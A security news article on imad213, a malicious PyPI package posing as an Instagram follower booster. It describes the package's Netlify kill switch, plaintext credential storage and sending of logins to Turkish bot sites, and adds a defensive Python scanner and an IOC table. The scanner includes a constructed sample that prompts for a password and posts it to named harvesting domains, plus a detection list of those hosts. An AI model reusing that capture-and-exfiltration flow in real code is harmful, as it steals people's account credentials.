A malicious Python package posing as an Instagram growth tool has been uncovered on the Python Package Index (PyPI), targeting unwitting users with credential theft and a sophisticated exfiltration pipeline.
Security researchers at Socket revealed that the package, named imad213, was authored by a threat actor using the alias im_ad__213 and distributed with professional branding, including a comprehensive README and seemingly legitimate safety tips.

PyPI Malware Masquerades as Social Media Booster
The tool, advertised as a way to boost Instagram followers, initially convinces users of its safety by recommending the use of temporary accounts.
After installation via a simple pip install imad213 command, the malware presents a polished interface labeled “INSTA-FOLLOWERS,” further easing user suspicion.
However, once executed, the script secretly connects to a Netlify-hosted file serving as a “kill switch.”
This remote check allows the attacker to disable the malware at any time, making detection and takedown significantly harder.
After passing the remote authentication step, the tool prompts users for their Instagram credentials under the guise of account verification necessary for providing follower boosts.
It deceptively saves these credentials in plaintext on the victim’s machine, and the code carries Arabic-language comments that mask its intent and possibly hint at the threat actor’s origin.
The true attack comes next: the stolen Instagram credentials are surreptitiously sent to ten different Turkish-hosted third-party bot services.
These sites, each with slick interfaces and phony disclaimers, collect and potentially resell or abuse harvested login details on a broad scale.

Notably, the infrastructure was found to be well-coordinated, with related domains registered through the same Turkish registrar and maintained under privacy protection for nearly four years.
VirusTotal and other security vendors have flagged the primary collection domain, takipcimx[.]net, for active phishing.
Coordinated Credential Harvesting Operation Detected
The attacker’s broader campaign is evidenced by similar packages (taya, a-b27, and poppo213) sharing branding, ASCII art, and code patterns.
This demonstrates a unified toolkit targeting not only Instagram but also Free Fire gamers and users of other social media platforms.
The operation’s use of legitimate hosting providers like Netlify to disguise command-and-control adds to the threat’s persistence, leveraging “trusted” infrastructure to bypass detection.
Distributing credentials to multiple sites suggests a credential laundering strategy, in which the attacker’s infrastructure obscures the true origin of stolen data.
Future adaptations could further exploit legitimate hosting, decentralized networks, and advanced social engineering, such as fake security features, to increase the rate of compromise and reduce traceability.
For users, the risks are severe: handing over Instagram credentials can result not just in account hijack or loss of direct messaging privacy but can also enable cross-platform attacks if similar passwords are used elsewhere.
Instagram’s own guidance warns against the use of unauthorized tools to inflate followers, often resulting in suspension or permanent bans for policy violations.
Researchers recommend heightened caution before installing any third-party “growth” utilities from PyPI or unofficial sources, and urge the use of multi-factor authentication and unique passwords for social media accounts.
Developers are encouraged to leverage advanced security scanning tools in their CI/CD pipelines to detect suspicious package behaviors before integrating them into projects.
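The behaviors described above (a Netlify-hosted kill switch, a plaintext credentials.txt written after a login prompt, and posts to the harvesting domains listed in the IOC table) are all visible statically. The following is an added example of the kind of pre-install check a CI/CD pipeline could run over a package’s source; it is not Socket’s tooling or the package’s own code. The indicator values are taken from this article’s IOC table, the two sample source strings are constructed for the demonstration, and the matching is heuristic (string literals and open() calls only), so it is a triage aid rather than a complete detector.

```python
"""Static triage of a Python source file for the behaviours described in the
article: a Netlify-hosted kill switch, plaintext credential storage, and
references to the credential-harvesting domains from the IOC table.
Standard library only."""
import ast
import re

# Indicators copied from the article's IOC table with the defanging brackets
# removed so they match real source. The article body spells the primary
# domain takipcimx.net while the table spells it takimcimx.net; both are kept.
IOC_DOMAINS = {
    "takimcimx.net", "takipcimx.net", "takimcizen.com", "bigtakip.net",
    "takimcigen.com", "takimciking.net", "takimcikrali.com", "takimcitime.net",
    "takip88.com", "instamoda.org",
}
KILL_SWITCH_URL = "https://imad-213-imad21.netlify.app/pass.txt"
CREDENTIAL_FILE = "credentials.txt"

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


def _matches_ioc(host: str) -> bool:
    """True for an IOC domain or any subdomain of one."""
    host = host.lower()
    return host in IOC_DOMAINS or any(host.endswith("." + d) for d in IOC_DOMAINS)


def _open_mode(call: ast.Call):
    """Return the literal mode passed to open(), or None if absent or non-literal."""
    if len(call.args) > 1 and isinstance(call.args[1], ast.Constant):
        return call.args[1].value
    for kw in call.keywords:
        if kw.arg == "mode" and isinstance(kw.value, ast.Constant):
            return kw.value.value
    return None


def scan_source(source: str) -> dict:
    """Walk the AST and collect string literals and open() calls matching the indicators."""
    findings = {
        "ioc_domains": set(),            # harvesting hosts referenced in the code
        "netlify_hosts": set(),          # any *.netlify.app host (trusted hosting used for C2)
        "kill_switch": False,            # exact kill-switch URL from the IOC table
        "credential_file_write": False,  # open('credentials.txt', 'w' or 'a')
    }
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            if node.value == KILL_SWITCH_URL:
                findings["kill_switch"] = True
            for host in URL_RE.findall(node.value):
                if _matches_ioc(host):
                    findings["ioc_domains"].add(host.lower())
                if host.lower().endswith(".netlify.app"):
                    findings["netlify_hosts"].add(host.lower())
        elif (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
              and node.func.id == "open" and node.args
              and isinstance(node.args[0], ast.Constant)
              and str(node.args[0].value).endswith(CREDENTIAL_FILE)):
            mode = _open_mode(node)
            if isinstance(mode, str) and ("w" in mode or "a" in mode):
                findings["credential_file_write"] = True
    return findings


def verdict(findings: dict) -> str:
    """'block' on any hard indicator, 'review' for Netlify-only references, else 'clean'."""
    if findings["ioc_domains"] or findings["kill_switch"] or findings["credential_file_write"]:
        return "block"
    if findings["netlify_hosts"]:
        return "review"
    return "clean"


# Constructed sample that mimics the described flow; this is not the real package's code.
SUSPICIOUS_SAMPLE = '''
import requests
GATE = "https://imad-213-imad21.netlify.app/pass.txt"
if requests.get(GATE).text.strip() != "open":
    raise SystemExit
user = input("Instagram username: ")
pw = input("Instagram password: ")
with open("credentials.txt", "a") as f:
    f.write(user + ":" + pw + "\\n")
for url in ["https://takipcimx.net/login", "https://takip88.com/api"]:
    requests.post(url, data={"u": user, "p": pw})
'''

# Constructed benign sample: reads a config file, references an unrelated host.
BENIGN_SAMPLE = '''
import json
with open("credentials.txt") as f:
    cfg = json.load(f)
ENDPOINT = "https://api.example.com/v1/ping"
'''

if __name__ == "__main__":
    for name, src in (("suspicious", SUSPICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        found = scan_source(src)
        print(name, verdict(found), sorted(found["ioc_domains"]))
```

Run it against the unpacked sdist or wheel of a candidate dependency before it reaches a build agent; a "block" verdict means the source references one of the article’s indicators or persists credentials to disk, while "review" only means a Netlify host appears and a human should look at what it is used for.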
Indicators of Compromise (IOC)
| Type | Indicator/Detail | Description/Notes |
|---|---|---|
| Threat Actor | im_ad__213 | PyPI author; email: madmadimado59@gmail[.]com |
| GitHub | https://github[.]com/imadoo27/ | Source repository hosting malicious code |
| C2/Remote Control | https://imad-213-imad21[.]netlify[.]app/pass[.]txt | Netlify kill switch file |
| Domains (Phishing) | takimcimx[.]net, takimcizen[.]com, bigtakip[.]net, takimcigen[.]com, takimciking[.]net, takimcikrali[.]com, takimcitime[.]net, takip88[.]com, instamoda[.]org | All flagged for credential theft/phishing |
| Local Artifact | credentials.txt | Stores stolen credentials in plaintext |
| Social Profile | instagram[.]com/nasreddin_imad | Linked attacker’s Instagram handle |
| MITRE ATT&CK | T1027, T1566.002, T1041, T1195.002 | Obfuscation, Phishing, Exfil over C2, Supply Chain |